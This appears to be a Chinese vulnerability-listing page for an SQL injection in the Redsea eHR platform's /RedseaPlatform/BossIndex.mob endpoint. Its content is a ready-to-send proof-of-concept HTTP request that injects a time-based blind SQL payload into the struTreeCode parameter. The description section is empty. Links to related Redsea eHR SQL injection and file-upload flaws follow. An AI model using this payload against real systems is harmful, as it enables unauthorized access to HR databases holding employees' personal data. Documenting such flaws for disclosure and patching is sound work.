红海云eHR /RedseaPlatform/BossIndex.mob SQL 注入漏洞

漏洞描述

PoC代码

GET /RedseaPlatform/BossIndex.mob?method=getNewStaffJoin&struTreeCode='+AND+(SELECT+3266+FROM+(SELECT(SLEEP(5)))ShXk)+AND+'qmyT'='qmyT HTTP/1.1

相关漏洞推荐

• 红海云eHR StWasAssessDept.mob SQL注入漏洞
• 红海云eHR BossIndex.mob SQL注入漏洞
• 红海云eHR系统 BossIndex.mob 存在SQL注入漏洞
• 红海云eHR系统 StWasAssessDept.mob 存在SQL注入漏洞
• 红海云 eHR /RedseaPlatform/goApp/pc.mob 存在SQL注入漏洞
• 红海云 eHR pc.mob SQL注入漏洞
• 红海云EHR kqFile.mob uploadFile 任意文件上传漏洞
• 红海云EHR kqFile.mob uploadNetFile 任意文件上传漏洞
• 红海云eHR系统 kgFile.mob 存在任意文件上传漏洞